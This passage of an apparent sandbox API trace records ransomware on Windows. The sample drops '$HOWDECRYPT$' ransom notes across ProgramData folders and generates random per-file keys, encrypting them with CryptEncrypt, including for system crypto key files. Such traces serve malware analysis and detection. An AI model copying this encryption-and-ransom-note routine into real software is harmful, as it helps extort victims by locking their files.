"c:\\programdata\\microsoft\\device stage\\device\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.478] GetProcessHeap () returned 0x2c0000 [0160.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07ec8 | out: hHeap=0x2c0000) returned 1 [0160.478] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.478] GetProcessHeap () returned 0x2c0000 [0160.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f499e0 | out: hHeap=0x2c0000) returned 1 [0160.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eae0 | out: pbBuffer=0x248eae0) returned 1 [0160.478] GetProcessHeap () returned 0x2c0000 [0160.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ead8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ead8*=0x30) returned 1 [0160.478] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.478] GetProcessHeap () returned 0x2c0000 [0160.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.478] GetProcessHeap () returned 0x2c0000 [0160.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40b80 | out: hHeap=0x2c0000) returned 1 [0160.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ead8 | out: pbBuffer=0x248ead8) returned 1 [0160.478] GetProcessHeap () returned 0x2c0000 [0160.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ead0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ead0*=0x30) returned 1 [0160.478] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.479] GetProcessHeap () returned 0x2c0000 [0160.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.479] GetProcessHeap () returned 0x2c0000 [0160.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40a68 | out: hHeap=0x2c0000) returned 1 [0160.479] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ead8 | out: pbBuffer=0x248ead8) returned 1 [0160.479] GetProcessHeap () returned 0x2c0000 [0160.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.479] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ead0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ead0*=0x30) returned 1 [0160.479] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.479] GetProcessHeap () returned 0x2c0000 [0160.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.479] GetProcessHeap () returned 0x2c0000 [0160.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40950 | out: hHeap=0x2c0000) returned 1 [0160.479] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.479] GetProcessHeap () returned 0x2c0000 [0160.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f498b8 | out: hHeap=0x2c0000) returned 1 [0160.479] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ead0 | out: pbBuffer=0x248ead0) returned 1 [0160.479] GetProcessHeap () returned 0x2c0000 [0160.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.480] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eac8*=0x30) returned 1 [0160.480] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.480] GetProcessHeap () returned 0x2c0000 [0160.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.480] GetProcessHeap () returned 0x2c0000 [0160.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40838 | out: hHeap=0x2c0000) returned 1 [0160.480] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eac8 | out: pbBuffer=0x248eac8) returned 1 [0160.480] GetProcessHeap () returned 0x2c0000 [0160.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.480] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eac0*=0x30) returned 1 [0160.480] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.480] GetProcessHeap () returned 0x2c0000 [0160.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.480] GetProcessHeap () returned 0x2c0000 [0160.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40720 | out: hHeap=0x2c0000) returned 1 [0160.480] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eac8 | out: pbBuffer=0x248eac8) returned 1 [0160.480] GetProcessHeap () returned 0x2c0000 [0160.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.480] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eac0*=0x30) returned 1 [0160.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.481] GetProcessHeap () returned 0x2c0000 [0160.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.481] GetProcessHeap () returned 0x2c0000 [0160.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40608 | out: hHeap=0x2c0000) returned 1 [0160.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eac0 | out: pbBuffer=0x248eac0) returned 1 [0160.481] GetProcessHeap () returned 0x2c0000 [0160.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eab8*=0x30) returned 1 [0160.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.481] GetProcessHeap () returned 0x2c0000 [0160.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.481] GetProcessHeap () returned 0x2c0000 [0160.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f404f0 | out: hHeap=0x2c0000) returned 1 [0160.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eac0 | out: pbBuffer=0x248eac0) returned 1 [0160.481] GetProcessHeap () returned 0x2c0000 [0160.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eab8*=0x30) returned 1 [0160.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.482] GetProcessHeap () returned 0x2c0000 [0160.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.482] GetProcessHeap () returned 0x2c0000 [0160.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f403d8 | out: hHeap=0x2c0000) returned 1 [0160.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.482] GetProcessHeap () returned 0x2c0000 [0160.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1cc0 | out: hHeap=0x2c0000) returned 1 [0160.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.482] GetProcessHeap () returned 0x2c0000 [0160.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9238 | out: hHeap=0x2c0000) returned 1 [0160.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.482] GetProcessHeap () returned 0x2c0000 [0160.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07df8 | out: hHeap=0x2c0000) returned 1 [0160.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eab0 | out: pbBuffer=0x248eab0) returned 1 [0160.482] GetProcessHeap () returned 0x2c0000 [0160.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eaa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eaa8*=0x30) returned 1 [0160.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.483] GetProcessHeap () returned 0x2c0000 [0160.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.483] GetProcessHeap () returned 0x2c0000 [0160.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f475b0 | out: hHeap=0x2c0000) returned 1 [0160.483] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eaa8 | out: pbBuffer=0x248eaa8) returned 1 [0160.483] GetProcessHeap () returned 0x2c0000 [0160.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eaa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eaa0*=0x30) returned 1 [0160.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.483] GetProcessHeap () returned 0x2c0000 [0160.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.483] GetProcessHeap () returned 0x2c0000 [0160.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47478 | out: hHeap=0x2c0000) returned 1 [0160.483] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eaa8 | out: pbBuffer=0x248eaa8) returned 1 [0160.483] GetProcessHeap () returned 0x2c0000 [0160.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248eaa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248eaa0*=0x30) returned 1 [0160.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.484] GetProcessHeap () returned 0x2c0000 [0160.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.484] GetProcessHeap () returned 0x2c0000 [0160.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf0c0 | out: hHeap=0x2c0000) returned 1 [0160.484] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eaa0 | out: pbBuffer=0x248eaa0) returned 1 [0160.484] GetProcessHeap () returned 0x2c0000 [0160.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.484] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea98*=0x30) returned 1 [0160.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.484] GetProcessHeap () returned 0x2c0000 [0160.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.484] GetProcessHeap () returned 0x2c0000 [0160.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf010 | out: hHeap=0x2c0000) returned 1 [0160.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.484] GetProcessHeap () returned 0x2c0000 [0160.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f2a8 | out: hHeap=0x2c0000) returned 1 [0160.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.484] GetProcessHeap () returned 0x2c0000 [0160.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9178 | out: hHeap=0x2c0000) returned 1 [0160.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea98 | out: pbBuffer=0x248ea98) returned 1 [0160.485] GetProcessHeap () returned 0x2c0000 [0160.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea90*=0x30) returned 1 [0160.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.." (normalized: "c:\\programdata\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.485] GetProcessHeap () returned 0x2c0000 [0160.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.485] GetProcessHeap () returned 0x2c0000 [0160.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a688 | out: hHeap=0x2c0000) returned 1 [0160.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea90 | out: pbBuffer=0x248ea90) returned 1 [0160.485] GetProcessHeap () returned 0x2c0000 [0160.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea88*=0x30) returned 1 [0160.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\." (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.485] GetProcessHeap () returned 0x2c0000 [0160.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.485] GetProcessHeap () returned 0x2c0000 [0160.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a548 | out: hHeap=0x2c0000) returned 1 [0160.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.486] GetProcessHeap () returned 0x2c0000 [0160.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea90b8 | out: hHeap=0x2c0000) returned 1 [0160.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.486] GetProcessHeap () returned 0x2c0000 [0160.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e988 | out: hHeap=0x2c0000) returned 1 [0160.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.486] GetProcessHeap () returned 0x2c0000 [0160.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8ff8 | out: hHeap=0x2c0000) returned 1 [0160.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.486] GetProcessHeap () returned 0x2c0000 [0160.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84b28 | out: hHeap=0x2c0000) returned 1 [0160.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.486] GetProcessHeap () returned 0x2c0000 [0160.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07d28 | out: hHeap=0x2c0000) returned 1 [0160.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.487] GetProcessHeap () returned 0x2c0000 [0160.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3278 | out: hHeap=0x2c0000) returned 1 [0160.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea78 | out: pbBuffer=0x248ea78) returned 1 [0160.487] GetProcessHeap () returned 0x2c0000 [0160.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.487] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea70*=0x30) returned 1 [0160.487] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.487] GetProcessHeap () returned 0x2c0000 [0160.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.487] GetProcessHeap () returned 0x2c0000 [0160.487] HeapFree (in: hHeap=0x2c0000, 